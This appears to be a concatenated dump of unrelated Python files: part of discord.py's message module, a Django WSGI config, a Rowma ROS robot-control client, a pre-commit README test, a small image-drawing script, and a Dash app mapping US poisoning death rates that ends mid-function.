if self.type is MessageType.premium_guild_tier_1:
return '{0.author.name} just boosted the server! {0.guild} has achieved **Level 1!**'.format(self)
if self.type is MessageType.premium_guild_tier_2:
return '{0.author.name} just boosted the server! {0.guild} has achieved **Level 2!**'.format(self)
if self.type is MessageType.premium_guild_tier_3:
return '{0.author.name} just boosted the server! {0.guild} has achieved **Level 3!**'.format(self)
if self.type is MessageType.channel_follow_add:
return '{0.author.name} has added {0.content} to this channel'.format(self)
async def delete(self, *, delay=None):
"""|coro|
Deletes the message.
Your own messages could be deleted without any proper permissions. However to
delete other people's messages, you need the :attr:`~Permissions.manage_messages`
permission.
.. versionchanged:: 1.1
Added the new ``delay`` keyword-only parameter.
Parameters
-----------
delay: Optional[:class:`float`]
If provided, the number of seconds to wait in the background
before deleting the message. If the deletion fails then it is silently ignored.
Raises
------
Forbidden
You do not have proper permissions to delete the message.
NotFound
The message was deleted already
HTTPException
Deleting the message failed.
"""
if delay is not None:
async def delete():
await asyncio.sleep(delay)
try:
await self._state.http.delete_message(self.channel.id, self.id)
except HTTPException:
pass
asyncio.ensure_future(delete(), loop=self._state.loop)
else:
await self._state.http.delete_message(self.channel.id, self.id)
async def edit(self, **fields):
"""|coro|
Edits the message.
The content must be able to be transformed into a string via ``str(content)``.
.. versionchanged:: 1.3
The ``suppress`` keyword-only parameter was added.
Parameters
-----------
content: Optional[:class:`str`]
The new content to replace the message with.
Could be ``None`` to remove the content.
embed: Optional[:class:`Embed`]
The new embed to replace the original with.
Could be ``None`` to remove the embed.
suppress: :class:`bool`
Whether to suppress embeds for the message. This removes
all the embeds if set to ``True``. If set to ``False``
this brings the embeds back if they were suppressed.
Using this parameter requires :attr:`~.Permissions.manage_messages`.
delete_after: Optional[:class:`float`]
If provided, the number of seconds to wait in the background
before deleting the message we just edited. If the deletion fails,
then it is silently ignored.
allowed_mentions: Optional[:class:`~discord.AllowedMentions`]
Controls the mentions being processed in this message. If this is
passed, then the object is merged with :attr:`~discord.Client.allowed_mentions`.
The merging behaviour only overrides attributes that have been explicitly passed
to the object, otherwise it uses the attributes set in :attr:`~discord.Client.allowed_mentions`.
If no object is passed at all then the defaults given by :attr:`~discord.Client.allowed_mentions`
are used instead.
.. versionadded:: 1.4
Raises
-------
HTTPException
Editing the message failed.
Forbidden
Tried to suppress a message without permissions or
edited a message's content or embed that isn't yours.
"""
try:
content = fields['content']
except KeyError:
pass
else:
if content is not None:
fields['content'] = str(content)
try:
embed = fields['embed']
except KeyError:
pass
else:
if embed is not None:
fields['embed'] = embed.to_dict()
try:
suppress = fields.pop('suppress')
except KeyError:
pass
else:
flags = MessageFlags._from_value(self.flags.value)
flags.suppress_embeds = suppress
fields['flags'] = flags.value
delete_after = fields.pop('delete_after', None)
try:
allowed_mentions = fields.pop('allowed_mentions')
except KeyError:
pass
else:
if allowed_mentions is not None:
if self._state.allowed_mentions is not None:
allowed_mentions = self._state.allowed_mentions.merge(allowed_mentions).to_dict()
else:
allowed_mentions = allowed_mentions.to_dict()
fields['allowed_mentions'] = allowed_mentions
if fields:
data = await self._state.http.edit_message(self.channel.id, self.id, **fields)
self._update(data)
if delete_after is not None:
await self.delete(delay=delete_after)
async def publish(self):
"""|coro|
Publishes this message to your announcement channel.
If the message is not your own then the :attr:`~Permissions.manage_messages`
permission is needed.
Raises
-------
Forbidden
You do not have the proper permissions to publish this message.
HTTPException
Publishing the message failed.
"""
await self._state.http.publish_message(self.channel.id, self.id)
async def pin(self, *, reason=None):
"""|coro|
Pins the message.
You must have the :attr:`~Permissions.manage_messages` permission to do
this in a non-private channel context.
Parameters
-----------
reason: Optional[:class:`str`]
The reason for pinning the message. Shows up on the audit log.
.. versionadded:: 1.4
Raises
-------
Forbidden
You do not have permissions to pin the message.
NotFound
The message or channel was not found or deleted.
HTTPException
Pinning the message failed, probably due to the channel
having more than 50 pinned messages.
"""
await self._state.http.pin_message(self.channel.id, self.id, reason=reason)
self.pinned = True
async def unpin(self, *, reason=None):
"""|coro|
Unpins the message.
You must have the :attr:`~Permissions.manage_messages` permission to do
this in a non-private channel context.
Parameters
-----------
reason: Optional[:class:`str`]
The reason for unpinning the message. Shows up on the audit log.
.. versionadded:: 1.4
Raises
-------
Forbidden
You do not have permissions to unpin the message.
NotFound
The message or channel was not found or deleted.
HTTPException
Unpinning the message failed.
"""
await self._state.http.unpin_message(self.channel.id, self.id, reason=reason)
self.pinned = False
async def add_reaction(self, emoji):
"""|coro|
Add a reaction to the message.
The emoji may be a unicode emoji or a custom guild :class:`Emoji`.
You must have the :attr:`~Permissions.read_message_history` permission
to use this. If nobody else has reacted to the message using this
emoji, the :attr:`~Permissions.add_reactions` permission is required.
Parameters
------------
emoji: Union[:class:`Emoji`, :class:`Reaction`, :class:`PartialEmoji`, :class:`str`]
The emoji to react with.
Raises
--------
HTTPException
Adding the reaction failed.
Forbidden
You do not have the proper permissions to react to the message.
NotFound
The emoji you specified was not found.
InvalidArgument
The emoji parameter is invalid.
"""
emoji = convert_emoji_reaction(emoji)
await self._state.http.add_reaction(self.channel.id, self.id, emoji)
async def remove_reaction(self, emoji, member):
"""|coro|
Remove a reaction by the member from the message.
The emoji may be a unicode emoji or a custom guild :class:`Emoji`.
If the reaction is not your own (i.e. ``member`` parameter is not you) then
the :attr:`~Permissions.manage_messages` permission is needed.
The ``member`` parameter must represent a member and meet
the :class:`abc.Snowflake` abc.
Parameters
------------
emoji: Union[:class:`Emoji`, :class:`Reaction`, :class:`PartialEmoji`, :class:`str`]
The emoji to remove.
member: :class:`abc.Snowflake`
The member for which to remove the reaction.
Raises
--------
HTTPException
Removing the reaction failed.
Forbidden
You do not have the proper permissions to remove the reaction.
NotFound
The member or emoji you specified was not found.
InvalidArgument
The emoji parameter is invalid.
"""
emoji = convert_emoji_reaction(emoji)
if member.id == self._state.self_id:
await self._state.http.remove_own_reaction(self.channel.id, self.id, emoji)
else:
await self._state.http.remove_reaction(self.channel.id, self.id, emoji, member.id)
async def clear_reaction(self, emoji):
"""|coro|
Clears a specific reaction from the message.
The emoji may be a unicode emoji or a custom guild :class:`Emoji`.
You need the :attr:`~Permissions.manage_messages` permission to use this.
.. versionadded:: 1.3
Parameters
-----------
emoji: Union[:class:`Emoji`, :class:`Reaction`, :class:`PartialEmoji`, :class:`str`]
The emoji to clear.
Raises
--------
HTTPException
Clearing the reaction failed.
Forbidden
You do not have the proper permissions to clear the reaction.
NotFound
The emoji you specified was not found.
InvalidArgument
The emoji parameter is invalid.
"""
emoji = convert_emoji_reaction(emoji)
await self._state.http.clear_single_reaction(self.channel.id, self.id, emoji)
async def clear_reactions(self):
"""|coro|
Removes all the reactions from the message.
You need the :attr:`~Permissions.manage_messages` permission to use this.
Raises
--------
HTTPException
Removing the reactions failed.
Forbidden
You do not have the proper permissions to remove all the reactions.
"""
await self._state.http.clear_reactions(self.channel.id, self.id)
async def ack(self):
"""|coro|
Marks this message as read.
The user must not be a bot user.
Raises
-------
HTTPException
Acking failed.
ClientException
You must not be a bot user.
"""
state = self._state
if state.is_bot:
raise ClientException('Must not be a bot account to ack messages.')
return await state.http.ack_message(self.channel.id, self.id)
async def reply(self, content=None, **kwargs):
"""|coro|
A shortcut method to :meth:`abc.Messageable.send` to reply to the
:class:`Message`.
.. versionadded:: 1.6
Raises
--------
~discord.HTTPException
Sending the message failed.
~discord.Forbidden
You do not have the proper permissions to send the message.
~discord.InvalidArgument
The ``files`` list is not of the appropriate size or
you specified both ``file`` and ``files``.
Returns
---------
:class:`Message`
The message that was sent.
"""
return await self.channel.send(content, reference=self, **kwargs)
def to_reference(self):
"""Creates a :class:`~discord.MessageReference` from the current message.
.. versionadded:: 1.6
Returns
---------
:class:`~discord.MessageReference`
The reference to this message.
"""
return MessageReference.from_message(self)
def to_message_reference_dict(self):
data = {
'message_id': self.id,
'channel_id': self.channel.id,
}
if self.guild is not None:
data['guild_id'] = self.guild.id
return data
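# implement_partial_methods (below) copies the Message methods named in a class's
# _exported_names tuple onto that class, so PartialMessage can reuse delete/pin/reply/etc.
# without re-implementing them.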
def implement_partial_methods(cls):
msg = Message
for name in cls._exported_names:
func = getattr(msg, name)
setattr(cls, name, func)
return cls
@implement_partial_methods
class PartialMessage(Hashable):
"""Represents a partial message to aid with working messages when only
a message and channel ID are present.
There are two ways to construct this class. The first one is through
the constructor itself, and the second is via
:meth:`TextChannel.get_partial_message` or :meth:`DMChannel.get_partial_message`.
Note that this class is trimmed down and has no rich attributes.
.. versionadded:: 1.6
.. container:: operations
.. describe:: x == y
Checks if two partial messages are equal.
.. describe:: x != y
Checks if two partial messages are not equal.
.. describe:: hash(x)
Returns the partial message's hash.
Attributes
-----------
channel: Union[:class:`TextChannel`, :class:`DMChannel`]
The channel associated with this partial message.
id: :class:`int`
The message ID.
"""
__slots__ = ('channel', 'id', '_cs_guild', '_state')
_exported_names = (
'jump_url',
'delete',
'publish',
'pin',
'unpin',
'add_reaction',
'remove_reaction',
'clear_reaction',
'clear_reactions',
'reply',
'to_reference',
'to_message_reference_dict',
)
def __init__(self, *, channel, id):
if channel.type not in (ChannelType.text, ChannelType.news, ChannelType.private):
raise TypeError('Expected TextChannel or DMChannel not %r' % type(channel))
self.channel = channel
self._state = channel._state
self.id = id
def _update(self, data):
# This is used for duck typing purposes.
# Just do nothing with the data.
pass
# Also needed for duck typing purposes
# n.b. not exposed
pinned = property(None, lambda x, y: ...)
def __repr__(self):
return '<PartialMessage id={0.id} channel={0.channel!r}>'.format(self)
@property
def created_at(self):
""":class:`datetime.datetime`: The partial message's creation time in UTC."""
return utils.snowflake_time(self.id)
@utils.cached_slot_property('_cs_guild')
def guild(self):
"""Optional[:class:`Guild`]: The guild that the partial message belongs to, if applicable."""
return getattr(self.channel, 'guild', None)
async def fetch(self):
"""|coro|
Fetches the partial message to a full :class:`Message`.
Raises
--------
NotFound
The message was not found.
Forbidden
You do not have the permissions required to get a message.
HTTPException
Retrieving the message failed.
Returns
--------
:class:`Message`
The full message.
"""
data = await self._state.http.get_message(self.channel.id, self.id)
return self._state.create_message(channel=self.channel, data=data)
async def edit(self, **fields):
"""|coro|
Edits the message.
The content must be able to be transformed into a string via ``str(content)``.
.. versionchanged:: 1.7
:class:`discord.Message` is returned instead of ``None`` if an edit took place.
Parameters
-----------
content: Optional[:class:`str`]
The new content to replace the message with.
Could be ``None`` to remove the content.
embed: Optional[:class:`Embed`]
The new embed to replace the original with.
Could be ``None`` to remove the embed.
suppress: :class:`bool`
Whether to suppress embeds for the message. This removes
all the embeds if set to ``True``. If set to ``False``
this brings the embeds back if they were suppressed.
Using this parameter requires :attr:`~.Permissions.manage_messages`.
delete_after: Optional[:class:`float`]
If provided, the number of seconds to wait in the background
before deleting the message we just edited. If the deletion fails,
then it is silently ignored.
allowed_mentions: Optional[:class:`~discord.AllowedMentions`]
Controls the mentions being processed in this message. If this is
passed, then the object is merged with :attr:`~discord.Client.allowed_mentions`.
The merging behaviour only overrides attributes that have been explicitly passed
to the object, otherwise it uses the attributes set in :attr:`~discord.Client.allowed_mentions`.
If no object is passed at all then the defaults given by :attr:`~discord.Client.allowed_mentions`
are used instead.
Raises
-------
NotFound
The message was not found.
HTTPException
Editing the message failed.
Forbidden
Tried to suppress a message without permissions or
edited a message's content or embed that isn't yours.
Returns
---------
Optional[:class:`Message`]
The message that was edited.
"""
try:
content = fields['content']
except KeyError:
pass
else:
if content is not None:
fields['content'] = str(content)
try:
embed = fields['embed']
except KeyError:
pass
else:
if embed is not None:
fields['embed'] = embed.to_dict()
try:
suppress = fields.pop('suppress')
except KeyError:
pass
else:
flags = MessageFlags._from_value(0)
flags.suppress_embeds = suppress
fields['flags'] = flags.value
delete_after = fields.pop('delete_after', None)
try:
allowed_mentions = fields.pop('allowed_mentions')
except KeyError:
pass
else:
if allowed_mentions is not None:
if self._state.allowed_mentions is not None:
allowed_mentions = self._state.allowed_mentions.merge(allowed_mentions).to_dict()
else:
allowed_mentions = allowed_mentions.to_dict()
fields['allowed_mentions'] = allowed_mentions
if fields:
data = await self._state.http.edit_message(self.channel.id, self.id, **fields)
if delete_after is not None:
await self.delete(delay=delete_after)
if fields:
return self._state.create_message(channel=self.channel, data=data)
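# Illustrative usage sketch (not part of the library); the channel and message IDs below are
# placeholders and a connected client with a running event loop is assumed:
#
#     channel = client.get_channel(123456789012345678)
#     partial = channel.get_partial_message(876543210987654321)
#     await partial.pin()                   # acts on the message without fetching it first
#     full_message = await partial.fetch()  # upgrade to a full Message when attributes are needed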
|
py | 7df7f9ccf2048dff63d71afda74b56e1397021ef | """
WSGI config for ds project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ds.settings")
application = get_wsgi_application()
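# Example (assumed deployment command, not part of this file): a WSGI server such as
# gunicorn can load the callable above with:
#   gunicorn ds.wsgi:application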
|
py | 7df7fb79dfb3105c0c881ae9b954bd673a37e84d | import socketio
import uuid
import json
import requests
import re
class Rowma:
"""
Rowma class implements some methods to operate connected robots.
Attributes:
base_url (string): ConnectionManager URL
"""
def __init__(self, base_url = 'https://rowma.moriokalab.com'):
self.base_url = base_url
self.sio = socketio.Client()
self.uuid = str(uuid.uuid4())
self.namespace = '/rowma'
self.handlers = {}
def connect(self):
"""connect to ConnectionManager
Returns:
void: No return values
Examples:
>>> rowma.connect()
Note:
sleep(1) (1 second) exists in this method to wait for connection establishment.
"""
self.sio.connect(self.base_url, namespaces=[self.namespace])
# sleep 1 second for connection establishment
self.sio.sleep(1)
payload = { 'applicationUuid': self.uuid }
self.sio.emit('register_application', data=payload, namespace=self.namespace)
self.sio.on('topic_to_application', handler=self._baseHandler, namespace=self.namespace)
def run_launch(self, uuid, command):
"""Send `roslaunch` command to the specified robot
Args:
uuid (string): Robot UUID
command (string): An argument of roslaunch command like 'my_pkg test.launch'
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.run_launch('xxxx-xxxx-xxxx', 'my_pkg test.launch')
roslaunch my_pkg test.launch will be executed at xxxx-xxxx-xxxx
"""
destination = { 'type': 'robot', 'uuid': uuid }
payload = { 'destination': destination, 'command': command }
self.sio.emit('run_launch', data=payload, namespace=self.namespace)
def publish(self, uuid, topic, msg):
"""Publish a topic to the specified robot
Args:
uuid (string): Robot UUID
topic (string): Topic name
msg (any): Topic message based on the topic's type
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.publish('xxxx-xxxx-xxxx', '/chatter', {'data': 'Hello World!'})
Note:
This method can not publish a topic to an Application, only to Robot.
"""
destination = { 'type': 'robot', 'uuid': uuid }
topic_message = {
"op": "publish",
"topic": topic,
"msg": msg
}
payload = { 'destination': destination, 'msg': topic_message }
self.sio.emit('topic_transfer', payload, namespace=self.namespace)
def set_topic_route(self, dest_uuid, topic_dest_type, topic_dest_uuid, topic, alias=None):
"""Create a route of a topic
Args:
dest_uuid (string): The destination's UUID of this instruction
topic_dest_type (string): 'robot' or 'application' for topic destination
topic_dest_uuid (string): The destination's UUID of the topic
topic (string): Topic name
alias? (string): Alias of the topic name, default: None
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.set_topic_route('xxxx-xxxx-robot', 'application', 'xxxx-xxxx-application', '/chatter')
Note:
The instruction itself is sent to the robot identified by dest_uuid; that robot then
forwards the topic to the destination described by topic_dest_type and topic_dest_uuid.
"""
destination = { 'type': 'robot', 'uuid': dest_uuid }
topic_destination = { 'type': topic_dest_type, 'uuid': topic_dest_uuid }
msg = {
'op': 'subscribe',
'topicDestination': topic_destination,
'topic': topic
}
if alias: msg.update({ 'alias': alias })
payload = {
'destination': destination,
'msg': msg
}
self.sio.emit('topic_transfer', payload, namespace=self.namespace)
def run_rosrun(self, uuid, command, args=''):
"""Send `rosrun` command to the specified robot
Args:
uuid (string): Robot UUID
command (string): The first argument of rosrun command like 'my_pkg my_node'
args (string, optional): The other arguments for rosrun command like 'setting.yml'
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.run_rosrun('xxxx-xxxx-xxxx', 'my_pkg my_node', 'setting.yml')
rosrun my_pkg my_node setting.yml at xxxx-xxxx-xxxx
"""
destination = { 'type': 'robot', 'uuid': uuid }
payload = {
'destination': destination,
'command': command,
'args': args
}
self.sio.emit('run_rosrun', payload, namespace=self.namespace)
def kill_nodes(self, uuid, rosnodes):
"""Kill running rosnodes in the specified robot
Args:
uuid (string): Robot UUID
rosnodes (Array<string>): The array of rosnodes' name
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.kill_nodes('xxxx-xxxx-xxxx', ['/chatter', '/chatter2'])
"""
destination = { 'type': 'robot', 'uuid': uuid }
payload = {
'destination': destination,
'rosnodes': rosnodes
}
self.sio.emit('kill_rosnodes', payload, namespace=self.namespace)
# TODO: Error handling
def get_current_connection_list(self):
"""Fetch currently connected robots from ConnectionManager
Returns:
Robot List (Array<dict>): An array of robots
Examples:
>>> rowma.get_current_connection_list()
[{'uuid': 'xxxx-xxxx-xxxx', 'rosnodes': [], ......}]
"""
r = requests.get(self.base_url + '/list_connections')
return json.loads(r.text)
# TODO: Error handling
def get_robot_status(self, uuid):
"""Fetch a robot by uuid from ConnectionManager
Args:
uuid (string): Robot UUID
Returns:
Robot (dict): An dict of a robot
Examples:
>>> rowma.get_robot_status('xxxx-xxxx-xxxx')
{'uuid': 'xxxx-xxxx-xxxx', 'rosnodes': [], ......}
"""
params = { 'uuid': uuid }
r = requests.get(self.base_url + '/robots', params=params)
return json.loads(r.text)
def subscribe(self, topic, handler):
"""Add subscriber function to a topic
Args:
topic (string): Topic name; it is matched as a regular expression against incoming topics
handler (callable): Function called with each matching message
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> def callback(msg):
... print(msg)
>>> rowma.subscribe('/chatter', callback)
"""
self.handlers[topic] = handler
def set_robot_uuid(self, robot_uuid):
"""Set robot UUID to current Application data stored in ConnectionManager
Args:
robot_uuid (string): Robot UUID
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.set_robot_uuid('xxxx-xxxx-xxxx')
Note:
This method is used when subscribing roslaunch_log or rosrun_log
"""
payload = {
'uuid': self.uuid,
'robotUuid': robot_uuid
}
self.sio.emit('update_application', payload, namespace=self.namespace)
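# _baseHandler (below) dispatches messages received on 'topic_to_application': every topic
# pattern registered via subscribe() is compiled as a regular expression, and each handler
# whose pattern matches the incoming topic is called with the message.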
def _baseHandler(self, msg):
topics = self.handlers.keys()
handler = None
for topic in topics:
r = re.compile(topic)
if re.match(r, msg['topic']) is not None:
handler = self.handlers[topic]
handler(msg)
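# Illustrative end-to-end sketch (the robot UUID is a placeholder; assumes a reachable
# ConnectionManager at the default base_url):
#
#     rowma = Rowma()
#     rowma.connect()
#     robots = rowma.get_current_connection_list()
#     robot_uuid = robots[0]['uuid']
#     rowma.set_topic_route(robot_uuid, 'application', rowma.uuid, '/chatter')
#     rowma.subscribe('/chatter', lambda msg: print(msg))
#     rowma.run_launch(robot_uuid, 'my_pkg test.launch')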
|
py | 7df7fcfeaee8c378f6d6065c01e893467cd9eb51 | from pre_commit_hooks.check_yaml import yaml
def test_readme_contains_all_hooks():
with open('README.md', encoding='UTF-8') as f:
readme_contents = f.read()
with open('.pre-commit-hooks.yaml', encoding='UTF-8') as f:
hooks = yaml.load(f)
for hook in hooks:
assert f'`{hook["id"]}`' in readme_contents
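# For reference, an entry in .pre-commit-hooks.yaml is expected to look roughly like the
# following (illustrative values), and the test above requires the backticked id
# `check-yaml` to appear somewhere in README.md:
#
#     - id: check-yaml
#       name: Check Yaml
#       entry: check-yaml
#       language: python
#       types: [yaml]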
|
py | 7df7fdd349c933e4770ab847674578dde4932880 | import imageio
import matplotlib.pyplot as plt
from PIL import Image
import numpy as np
im = Image.new("RGB", (169,169), "white")
pic = np.array(im)
im=pic
t=70  # size of the cross
col=-170
lig=170
pioncollig=[0,0]  # pawn position: column number, then row number
c=[87+pioncollig[0]*col,87+pioncollig[1]*lig]  # center of the pawn at the bottom left
for k in range(169):
for j in range(169):
im[k,j] = (156,97,65)
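# The nested loop below draws the mark: points where a is within 5 of o form one diagonal
# stroke through c, and the mirrored column index (170 - c[1] - a) adds the opposite
# diagonal, producing an X-shaped cross in dark pixels on the brown background.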
for o in range(-t,t):
for a in range(-t,t):
b=o*2
if -5<o+a-b<5:
im[c[0]+o,c[1]+a] = (20,20,20)
im[c[0]+o,170-c[1]-a] = (20,20,20)
imageio.imsave("dagger.png", im)
|
py | 7df7ff5b24d9265a3f7ee6caf71204a308aea048 | import os
import pathlib
import re
import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
from dash.dependencies import Input, Output, State
import cufflinks as cf
# Initialize app
app = dash.Dash(
__name__,
meta_tags=[
{"name": "viewport", "content": "width=device-width, initial-scale=1.0"}
],
)
app.title = "US Opioid Epidemic"
server = app.server
# Load data
APP_PATH = str(pathlib.Path(__file__).parent.resolve())
df_lat_lon = pd.read_csv(
os.path.join(APP_PATH, os.path.join("data", "lat_lon_counties.csv"))
)
df_lat_lon["FIPS "] = df_lat_lon["FIPS "].apply(lambda x: str(x).zfill(5))
df_full_data = pd.read_csv(
os.path.join(
APP_PATH, os.path.join("data", "age_adjusted_death_rate_no_quotes.csv")
)
)
df_full_data["County Code"] = df_full_data["County Code"].apply(
lambda x: str(x).zfill(5)
)
df_full_data["County"] = (
df_full_data["Unnamed: 0"] + ", " + df_full_data.County.map(str)
)
YEARS = [2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015]
BINS = [
"0-2",
"2.1-4",
"4.1-6",
"6.1-8",
"8.1-10",
"10.1-12",
"12.1-14",
"14.1-16",
"16.1-18",
"18.1-20",
"20.1-22",
"22.1-24",
"24.1-26",
"26.1-28",
"28.1-30",
">30",
]
DEFAULT_COLORSCALE = [
"#f2fffb",
"#bbffeb",
"#98ffe0",
"#79ffd6",
"#6df0c8",
"#69e7c0",
"#59dab2",
"#45d0a5",
"#31c194",
"#2bb489",
"#25a27b",
"#1e906d",
"#188463",
"#157658",
"#11684d",
"#10523e",
]
DEFAULT_OPACITY = 0.8
mapbox_access_token = "pk.eyJ1IjoicGxvdGx5bWFwYm94IiwiYSI6ImNrOWJqb2F4djBnMjEzbG50amg0dnJieG4ifQ.Zme1-Uzoi75IaFbieBDl3A"
mapbox_style = "mapbox://styles/plotlymapbox/cjvprkf3t1kns1cqjxuxmwixz"
# App layout
app.layout = html.Div(
id="root",
children=[
html.Div(
id="header",
children=[
html.Img(id="logo", src=app.get_asset_url("dash-logo.png")),
html.H4(children="Rate of US Poison-Induced Deaths"),
html.P(
id="description",
children="† Deaths are classified using the International Classification of Diseases, \
Tenth Revision (ICD–10). Drug-poisoning deaths are defined as having ICD–10 underlying \
cause-of-death codes X40–X44 (unintentional), X60–X64 (suicide), X85 (homicide), or Y10–Y14 \
(undetermined intent).",
),
],
),
html.Div(
id="app-container",
children=[
html.Div(
id="left-column",
children=[
html.Div(
id="slider-container",
children=[
html.P(
id="slider-text",
children="Drag the slider to change the year:",
),
dcc.Slider(
id="years-slider",
min=min(YEARS),
max=max(YEARS),
value=min(YEARS),
marks={
str(year): {
"label": str(year),
"style": {"color": "#7fafdf"},
}
for year in YEARS
},
),
],
),
html.Div(
id="heatmap-container",
children=[
html.P(
"Heatmap of age adjusted mortality rates \
from poisonings in year {0}".format(
min(YEARS)
),
id="heatmap-title",
),
dcc.Graph(
id="county-choropleth",
figure=dict(
layout=dict(
mapbox=dict(
layers=[],
accesstoken=mapbox_access_token,
style=mapbox_style,
center=dict(
lat=38.72490, lon=-95.61446
),
pitch=0,
zoom=3.5,
),
autosize=True,
),
),
),
],
),
],
),
html.Div(
id="graph-container",
children=[
html.P(id="chart-selector", children="Select chart:"),
dcc.Dropdown(
options=[
{
"label": "Histogram of total number of deaths (single year)",
"value": "show_absolute_deaths_single_year",
},
{
"label": "Histogram of total number of deaths (1999-2016)",
"value": "absolute_deaths_all_time",
},
{
"label": "Age-adjusted death rate (single year)",
"value": "show_death_rate_single_year",
},
{
"label": "Trends in age-adjusted death rate (1999-2016)",
"value": "death_rate_all_time",
},
],
value="show_death_rate_single_year",
id="chart-dropdown",
),
dcc.Graph(
id="selected-data",
figure=dict(
data=[dict(x=0, y=0)],
layout=dict(
paper_bgcolor="#F4F4F8",
plot_bgcolor="#F4F4F8",
autofill=True,
margin=dict(t=75, r=50, b=100, l=50),
),
),
),
],
),
],
),
],
)
@app.callback(
Output("county-choropleth", "figure"),
[Input("years-slider", "value")],
[State("county-choropleth", "figure")],
)
def display_map(year, figure):
cm = dict(zip(BINS, DEFAULT_COLORSCALE))
data = [
dict(
lat=df_lat_lon["Latitude "],
lon=df_lat_lon["Longitude"],
text=df_lat_lon["Hover"],
type="scattermapbox",
hoverinfo="text",
marker=dict(size=5, color="white", opacity=0),
)
]
annotations = [
dict(
showarrow=False,
align="right",
text="<b>Age-adjusted death rate<br>per county per year</b>",
font=dict(color="#2cfec1"),
bgcolor="#1f2630",
x=0.95,
y=0.95,
)
]
for i, bin in enumerate(reversed(BINS)):
color = cm[bin]
annotations.append(
dict(
arrowcolor=color,
text=bin,
x=0.95,
y=0.85 - (i / 20),
ax=-60,
ay=0,
arrowwidth=5,
arrowhead=0,
bgcolor="#1f2630",
font=dict(color="#2cfec1"),
)
)
if "layout" in figure:
lat = figure["layout"]["mapbox"]["center"]["lat"]
lon = figure["layout"]["mapbox"]["center"]["lon"]
zoom = figure["layout"]["mapbox"]["zoom"]
else:
lat = 38.72490
lon = -95.61446
zoom = 3.5
layout = dict(
mapbox=dict(
layers=[],
accesstoken=mapbox_access_token,
style=mapbox_style,
center=dict(lat=lat, lon=lon),
zoom=zoom,
),
hovermode="closest",
margin=dict(r=0, l=0, t=0, b=0),
annotations=annotations,
dragmode="lasso",
)
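# One fill layer is appended per rate bin: each (year, bin) pair maps to a pre-generated
# GeoJSON of the counties falling in that bin, fetched from base_url below
# (e.g. ".../2015/4.1-6.geojson" — URL shape inferred from the concatenation that follows).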
base_url = "https://raw.githubusercontent.com/jackparmer/mapbox-counties/master/"
for bin in BINS:
geo_layer = dict(
sourcetype="geojson",
source=base_url + str(year) + "/" + bin + ".geojson",
type="fill",
color=cm[bin],
opacity=DEFAULT_OPACITY,
# CHANGE THIS
fill=dict(outlinecolor="#afafaf"),
)
layout["mapbox"]["layers"].append(geo_layer)
fig = dict(data=data, layout=layout)
return fig
@app.callback(Output("heatmap-title", "children"), [Input("years-slider", "value")])
def update_map_title(year):
return "Heatmap of age adjusted mortality rates \
from poisonings in year {0}".format(
year
)
@app.callback(
Output("selected-data", "figure"),
[
Input("county-choropleth", "selectedData"),
Input("chart-dropdown", "value"),
Input("years-slider", "value"),
],
)
def display_selected_data(selectedData, chart_dropdown, year):
if selectedData is None:
return dict(
data=[dict(x=0, y=0)],
layout=dict(
title="Click-drag on the map to select counties",
paper_bgcolor="#1f2630",
plot_bgcolor="#1f2630",
font=dict(color="#2cfec1"),
margin=dict(t=75, r=50, b=100, l=75),
),
)
pts = selectedData["points"]
fips = [str(pt["text"].split("<br>")[-1]) for pt in pts]
for i in range(len(fips)):
if len(fips[i]) == 4:
fips[i] = "0" + fips[i]
dff = df_full_data[df_full_data["County Code"].isin(fips)]
dff = dff.sort_values("Year")
regex_pat = re.compile(r"Unreliable", flags=re.IGNORECASE)
dff["Age Adjusted Rate"] = dff["Age Adjusted Rate"].replace(regex_pat, 0)
if chart_dropdown != "death_rate_all_time":
title = "Absolute deaths per county, <b>1999-2016</b>"
AGGREGATE_BY = "Deaths"
if "show_absolute_deaths_single_year" == chart_dropdown:
dff = dff[dff.Year == year]
title = "Absolute deaths per county, <b>{0}</b>".format(year)
elif "show_death_rate_single_year" == chart_dropdown:
dff = dff[dff.Year == year]
title = "Age-adjusted death rate per county, <b>{0}</b>".format(year)
AGGREGATE_BY = "Age Adjusted Rate"
dff[AGGREGATE_BY] = pd.to_numeric(dff[AGGREGATE_BY], errors="coerce")
deaths_or_rate_by_fips = dff.groupby("County")[AGGREGATE_BY].sum()
deaths_or_rate_by_fips = deaths_or_rate_by_fips.sort_values()
# Only look at non-zero rows:
deaths_or_rate_by_fips = deaths_or_rate_by_fips[deaths_or_rate_by_fips > 0]
fig = deaths_or_rate_by_fips.iplot(
kind="bar", y=AGGREGATE_BY, title=title, asFigure=True
)
fig_layout = fig["layout"]
fig_data = fig["data"]
fig_data[0]["text"] = deaths_or_rate_by_fips.values.tolist()
fig_data[0]["marker"]["color"] = "#2cfec1"
fig_data[0]["marker"]["opacity"] = 1
fig_data[0]["marker"]["line"]["width"] = 0
fig_data[0]["textposition"] = "outside"
fig_layout["paper_bgcolor"] = "#1f2630"
fig_layout["plot_bgcolor"] = "#1f2630"
fig_layout["font"]["color"] = "#2cfec1"
fig_layout["title"]["font"]["color"] = "#2cfec1"
fig_layout["xaxis"]["tickfont"]["color"] = "#2cfec1"
fig_layout["yaxis"]["tickfont"]["color"] = "#2cfec1"
fig_layout["xaxis"]["gridcolor"] = "#5b5b5b"
fig_layout["yaxis"]["gridcolor"] = "#5b5b5b"
fig_layout["margin"]["t"] = 75
fig_layout["margin"]["r"] = 50
fig_layout["margin"]["b"] = 100
fig_layout["margin"]["l"] = 50
return fig
fig = dff.iplot(
kind="area",
x="Year",
y="Age Adjusted Rate",
text="County",
categories="County",
colors=[
"#1b9e77",
"#d95f02",
"#7570b3",
"#e7298a",
"#66a61e",
"#e6ab02",
"#a6761d",
"#666666",
"#1b9e77",
],
vline=[year],
asFigure=True,
)
for i, trace in enumerate(fig["data"]):
trace["mode"] = "lines+markers"
trace["marker"]["size"] = 4
